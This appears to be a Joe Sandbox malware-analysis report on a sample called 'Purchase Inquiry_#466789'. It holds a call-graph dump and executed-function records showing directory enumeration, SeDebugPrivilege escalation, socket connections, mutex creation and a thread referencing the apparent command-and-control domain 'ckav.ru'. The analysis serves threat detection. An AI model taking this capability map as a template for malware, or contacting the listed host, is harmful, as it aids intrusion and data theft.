calls 9311->9312 9313 4094fe 9312->9313 9314 409554 9313->9314 9315 405b6f 6 API calls 9313->9315 9316 409514 9315->9316 9317 404b22 6 API calls 9316->9317 9323 40954d 9316->9323 9319 40952d 9317->9319 9318 402bab 2 API calls 9318->9314 9320 409408 15 API calls 9319->9320 9325 409544 9319->9325 9322 40953e 9320->9322 9321 402bab 2 API calls 9321->9323 9324 402bab 2 API calls 9322->9324 9323->9318 9324->9325 9325->9321 9334 4058ea 9335 4031e5 4 API calls 9334->9335 9336 4058fd StrStrA 9335->9336 9968 40d4ea 9969 404bee 6 API calls 9968->9969 9970 40d500 9969->9970 9971 40d5a0 9970->9971 9972 404bee 6 API calls 9970->9972 9973 40d529 9972->9973 9974 404bee 6 API calls 9973->9974 9975 40d537 9974->9975 9976 404bee 6 API calls 9975->9976 9977 40d546 9976->9977 9977->9971 9978 405872 4 API calls 9977->9978 9979 40d56d 9978->9979 9980 405872 4 API calls 9979->9980 9981 40d57c 9980->9981 9982 405872 4 API calls 9981->9982 9983 40d58e 9982->9983 9984 405872 4 API calls 9983->9984 9984->9971 9985 40a3ea 9986 40374e 6 API calls 9985->9986 9987 40a403 9986->9987 9988 40a419 9987->9988 9989 4059d8 4 API calls 9987->9989 9990 40a411 9989->9990 9991 402bab 2 API calls 9990->9991 9991->9988 9374 404df3 WSAStartup 9378 4091f6 9379 404b22 6 API calls 9378->9379 9380 40920b 9379->9380 9381 409222 9380->9381 9382 409408 15 API calls 9380->9382 9383 40921c 9382->9383 9384 402bab 2 API calls 9383->9384 9384->9381 10018 4117fe 10019 404c4e 6 API calls 10018->10019 10020 411888 10019->10020 10021 404c4e 6 API calls 10020->10021 10023 411925 10020->10023 10022 4118ab 10021->10022 10022->10023 10037 4119b3 10022->10037 10025 4118c5 10026 4119b3 4 API calls 10025->10026 10027 4118d0 10026->10027 10027->10023 10028 4056bf 2 API calls 10027->10028 10029 4118fd 10028->10029 10030 405872 4 API calls 10029->10030 10031 41190a 10030->10031 10032 405872 4 API calls 10031->10032 10033 411915 10032->10033 10034 413aca 4 API calls 10033->10034 10035 41191f 10034->10035 10036 405695 2 API calls 10035->10036 10036->10023 10038 4119c6 10037->10038 10039 4119bf 10037->10039 10040 4031e5 4 API calls 10038->10040 10039->10025 10040->10039 9388 40e880 9389 41219c 14 API calls 9388->9389 9390 40e88e 9389->9390 9391 41219c 14 API calls 9390->9391 9392 40e89c 9391->9392 10104 40e48a 10105 404bee 6 API calls 10104->10105 10106 40e4d0 10105->10106 10107 40e4f4 10106->10107 10108 405872 4 API calls 10106->10108 10108->10107 9489 410390 9490 404b22 6 API calls 9489->9490 9491 4103a5 9490->9491 9492 410409 9491->9492 9493 405b6f 6 API calls 9491->9493 9496 4103ba 9493->9496 9494 410402 9495 402bab 2 API calls 9494->9495 9495->9492 9496->9494 9498 403d74 19 API calls 9496->9498 9501 4103fb 9496->9501 9497 402bab 2 API calls 9497->9494 9499 4103ee 9498->9499 9500 402bab 2 API calls 9499->9500 9499->9501 9500->9501 9501->9497 10119 40ed96 10120 4040bb 12 API calls 10119->10120 10134 40edb0 10120->10134 10121 40ef90 10122 40ef87 10123 403f9e 5 API calls 10122->10123 10123->10121 10124 405ae9 6 API calls 10124->10134 10125 412269 6 API calls 10125->10134 10126 40ef61 10129 40ef6e 10126->10129 10130 402bab 2 API calls 10126->10130 10127 402bab GetProcessHeap HeapFree 10127->10134 10128 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10128->10134 10131 40ef7c 10129->10131 10132 402bab 2 API calls 10129->10132 10130->10129 10131->10122 10133 402bab 2 API calls 10131->10133 10132->10131 10133->10122 10134->10121 10134->10122 10134->10124 10134->10125 10134->10126 10134->10127 10134->10128 10135 40ef98 10136 404c4e 6 API calls 10135->10136 10137 40efb6 10136->10137 10138 40f02a 10137->10138 10150 40f054 10137->10150 10141 404bee 6 API calls 10142 40efda 10141->10142 10143 404bee 6 API calls 10142->10143 10144 40efe9 10143->10144 10144->10138 10145 405872 4 API calls 10144->10145 10146 40f008 10145->10146 10147 405872 4 API calls 10146->10147 10148 40f01a 10147->10148 10149 405872 4 API calls 10148->10149 10149->10138 10151 40f064 10150->10151 10152 402b7c 2 API calls 10151->10152 10154 40f072 10152->10154 10153 40efca 10153->10141 10154->10153 10156 405ecd 10154->10156 10157 4059b8 4 API calls 10156->10157 10158 405edf 10157->10158 10158->10154 9508 410c98 9509 41219c 14 API calls 9508->9509 9510 410ca8 9509->9510 9511 41219c 14 API calls 9510->9511 9512 410cb5 9511->9512 9513 412093 20 API calls 9512->9513 9514 410cc9 9513->9514 10228 41249c 10229 4056bf 2 API calls 10228->10229 10230 4124aa 10229->10230 10231 4057df 13 API calls 10230->10231 10236 4124ce 10230->10236 10232 4124be 10231->10232 10233 413aca 4 API calls 10232->10233 10234 4124c8 10233->10234 10235 405695 2 API calls 10234->10235 10235->10236 9518 40f49e 9519 40f4b6 13 API calls 9518->9519 9520 40f4a8 9519->9520 9521 40929e 9522 413b28 6 API calls 9521->9522 9523 4092a4 9522->9523 9524 405b6f 6 API calls 9523->9524 9525 4092af 9524->9525 9526 4092c5 9525->9526 9527 409408 15 API calls 9525->9527 9528 4092bf 9527->9528 9529 402bab 2 API calls 9528->9529 9529->9526 10255 407fa4 10256 407fb7 10255->10256 10257 402b7c 2 API calls 10256->10257 10259 407fee 10256->10259 10258 40800d 10257->10258 10258->10259 10260 4037be 4 API calls 10258->10260 10261 40803c 10260->10261 10262 402bab 2 API calls 10261->10262 10262->10259 9566 4090aa 9567 404b22 6 API calls 9566->9567 9568 4090c1 9567->9568 9569 4090d8 9568->9569 9570 409408 15 API calls 9568->9570 9571 404b22 6 API calls 9569->9571 9572 4090d2 9570->9572 9573 4090eb 9571->9573 9574 402bab 2 API calls 9572->9574 9575 408c4d 15 API calls 9573->9575 9578 409104 9573->9578 9574->9569 9576 4090fe 9575->9576 9577 402bab 2 API calls 9576->9577 9577->9578 9585 409cae 9600 404b79 9585->9600 9587 409cc5 9588 409d27 9587->9588 9590 405b6f 6 API calls 9587->9590 9591 409d2f 9587->9591 9589 402bab 2 API calls 9588->9589 9589->9591 9592 409cec 9590->9592 9592->9588 9593 404b79 6 API calls 9592->9593 9594 409d05 9593->9594 9595 409d1e 9594->9595 9596 408c4d 15 API calls 9594->9596 9597 402bab 2 API calls 9595->9597 9598 409d18 9596->9598 9597->9588 9599 402bab 2 API calls 9598->9599 9599->9595 9601 404b22 6 API calls 9600->9601 9602 404b8a 9601->9602 9602->9587 10322 411fb3 10323 405b6f 6 API calls 10322->10323 10325 412013 10323->10325 10324 412075 10325->10324 10340 41206a 10325->10340 10341 411a8d 10325->10341 10327 402bab 2 API calls 10327->10324 10329 4056bf 2 API calls 10330 41203d 10329->10330 10331 405872 4 API calls 10330->10331 10332 41204a 10331->10332 10333 413aca 4 API calls 10332->10333 10334 412054 10333->10334 10335 405695 2 API calls 10334->10335 10336 41205a 10335->10336 10337 413a58 13 API calls 10336->10337 10338 412064 10337->10338 10339 402bab 2 API calls 10338->10339 10339->10340 10340->10327 10342 402b7c 2 API calls 10341->10342 10343 411aa3 10342->10343 10351 411f05 10343->10351 10364 404ada 10343->10364 10346 404ada 4 API calls 10347 411cad 10346->10347 10348 411f0c 10347->10348 10349 411cc0 10347->10349 10350 402bab 2 API calls 10348->10350 10367 405eb6 10349->10367 10350->10351 10351->10329 10351->10340 10353 411d3c 10354 4031e5 4 API calls 10353->10354 10362 411d7b 10354->10362 10355 411ea6 10356 4031e5 4 API calls 10355->10356 10357 411eb5 10356->10357 10358 4031e5 4 API calls 10357->10358 10359 411ed6 10358->10359 10360 405eb6 4 API calls 10359->10360 10360->10351 10361 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10361->10362 10362->10355 10362->10361 10363 405eb6 4 API calls 10362->10363 10363->10362 10365 4031e5 4 API calls 10364->10365 10366 404afd 10365->10366 10366->10346 10368 405998 4 API calls 10367->10368 10369 405ec8 10368->10369 10369->10353 9632 40f6b8 9633 41219c 14 API calls 9632->9633 9634 40f6c7 9633->9634 9635 41219c 14 API calls 9634->9635 9636 40f6d5 9635->9636 9637 41219c 14 API calls 9636->9637 9638 40f6df 9637->9638 9657 40d6bd 9658 4056bf 2 API calls 9657->9658 9659 40d6c9 9658->9659 9670 404cbf 9659->9670 9662 404cbf 8 API calls 9663 40d6f4 9662->9663 9664 404cbf 8 API calls 9663->9664 9665 40d702 9664->9665 9666 413aca 4 API calls 9665->9666 9667 40d711 9666->9667 9668 405695 2 API calls 9667->9668 9669 40d71f 9668->9669 9671 402b7c 2 API calls 9670->9671 9672 404ccd 9671->9672 9673 404ddc 9672->9673 9674 404b8f 5 API calls 9672->9674 9673->9662 9675 404ce4 9674->9675 9676 404dd4 9675->9676 9678 402b7c 2 API calls 9675->9678 9677 402bab 2 API calls 9676->9677 9677->9673 9679 404d04 9678->9679 9680 404dcc 9679->9680 9682 404dc6 9679->9682 9683 402b7c 2 API calls 9679->9683 9685 404b8f 5 API calls 9679->9685 9686 402bab GetProcessHeap HeapFree 9679->9686 9687 404a39 5 API calls 9679->9687 9688 405b6f 6 API calls 9679->9688 9689 404cbf 8 API calls 9679->9689 9681 404a39 5 API calls 9680->9681 9681->9676 9684 402bab 2 API calls 9682->9684 9683->9679 9684->9680 9685->9679 9686->9679 9687->9679 9688->9679 9689->9679 9690 40f0bf 9691 4056bf 2 API calls 9690->9691 9692 40f0c9 9691->9692 9693 40f115 9692->9693 9695 404cbf 8 API calls 9692->9695 9694 41219c 14 API calls 9693->9694 9696 40f128 9694->9696 9697 40f0ed 9695->9697 9698 404cbf 8 API calls 9697->9698 9699 40f0fb 9698->9699 9700 413aca 4 API calls 9699->9700 9701 40f10a 9700->9701 9702 405695 2 API calls 9701->9702 9702->9693

                    Executed Functions

                    Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 161 403dd1-403dd8 151->161 162 403e9d-403ea4 call 402bab 151->162 154 403f97-403f9d 152->154 159 403ee8-403ef8 call 405d24 153->159 160 403f8e-403f94 call 402bab 153->160 176 403f03-403f0a 159->176 177 403efa-403f01 159->177 160->152 166 403e75-403e90 call 4031e5 FindNextFileW 161->166 167 403dde-403de2 161->167 162->150 166->161 180 403e96-403e97 call 403bef 166->180 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 189 403e30-403e4c call 405b6f 172->189 190 403e24-403e2e 172->190 173->166 186 403dfb-403e10 call 405eff 173->186 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 193 403e9c 180->193 196 403f87-403f88 call 403bef 181->196 197 403f5e-403f61 181->197 182->181 199 403f2f-403f33 182->199 183->181 183->182 186->166 186->172 189->166 203 403e4e-403e6f call 403d74 call 402bab 189->203 190->166 190->189 193->162 205 403f8d 196->205 197->159 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 205->160 209->181 217->154
                    APIs
                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFind$FirstNext
                    • String ID: %s\%s$%s\*$Program Files$Windows
                    • API String ID: 1690352074-2009209621
                    • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                    • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                    • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                    • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                    Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                    • String ID: SeDebugPrivilege
                    • API String ID: 3615134276-2896544425
                    • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                    • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                    • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                    • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                    Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                    • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcess
                    • String ID:
                    • API String ID: 1357844191-0
                    • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                    • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                    • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                    • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                    Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                    Download Yara Rule
                    APIs
                    • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: recv
                    • String ID:
                    • API String ID: 1507349165-0
                    • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                    • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                    • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                    • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                    Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 237 40624c-406258 call 402b7c 230->237 238 40623d-406249 call 40338c 230->238 235 406329-40632e 231->235 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 237->246 247 40625a-406266 call 40338c 237->247 238->237 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 262 4062a2-4062b9 call 406086 253->262 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 263 40630c 256->263 259 406311-406317 call 402bab 257->259 260 406318-40631e 257->260 259->260 265 406320-406326 call 402bab 260->265 266 406327 260->266 272 4062f5-4062fd call 402bab 262->272 273 4062bb-4062e4 call 4031e5 262->273 263->257 265->266 266->235 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                    APIs
                    • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                    • _wmemset.LIBCMT ref: 00406244
                    • _wmemset.LIBCMT ref: 00406261
                    • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wmemset$ErrorInformationLastToken
                    • String ID: IDA$IDA
                    • API String ID: 487585393-2020647798
                    • Opcode ID: a5e5aa255662804c4e67c84550f50b624ac64f77e5461781f5e6cba767b6fa0d
                    • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                    • Opcode Fuzzy Hash: a5e5aa255662804c4e67c84550f50b624ac64f77e5461781f5e6cba767b6fa0d
                    • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                    Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 553 404ec7-404ec9 542->553 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 547 404ec0-404ec6 call 402bab 545->547 548 404ecb 545->548 546->545 547->553 552 404ecd-404ece 548->552 552->539 553->552
                    APIs
                    • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                    • socket.WS2_32(?,?,?), ref: 00404E7A
                    • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: freeaddrinfogetaddrinfosocket
                    • String ID:
                    • API String ID: 2479546573-0
                    • Opcode ID: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                    • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                    • Opcode Fuzzy Hash: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                    • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                    Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 571 404113-404119 559->571 572 40417a 559->572 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 568 4041a9-4041b8 call 403c59 562->568 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 568->576 577 4041db-4041e4 call 402bab 568->577 571->572 575 40411b-404120 571->575 574 40417d-40417e call 403c40 572->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->572 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AllocCreateReadVirtual
                    • String ID: .tmp
                    • API String ID: 3585551309-2986845003
                    • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                    • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                    • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                    • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                    Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                    • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                    • GetLastError.KERNEL32 ref: 0041399E
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: Error$CreateLastModeMutex
                    • String ID:
                    • API String ID: 3448925889-0
                    • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                    • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                    • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                    • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                    Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                    • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CreatePointerWrite
                    • String ID:
                    • API String ID: 3672724799-0
                    • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                    • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                    • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                    • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                    Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                      • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                      • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                      • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$CreateFreeProcessThread_wmemset
                    • String ID: ckav.ru
                    • API String ID: 2915393847-2696028687
                    • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                    • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                    • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                    • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                    Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    • _wmemset.LIBCMT ref: 0040634F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcess_wmemset
                    • String ID: CA
                    • API String ID: 2773065342-1052703068
                    • Opcode ID: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                    • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                    • Opcode Fuzzy Hash: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                    • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                    Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                    • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.2908357290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_Purchase Inquiry_#466789.jbxd
                    Yara matches
                    Similarity
                    • API ID: InformationToken
                    • String ID: IDA
                    • API String ID: 4114910276-365204570
                    • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                    • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                    • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
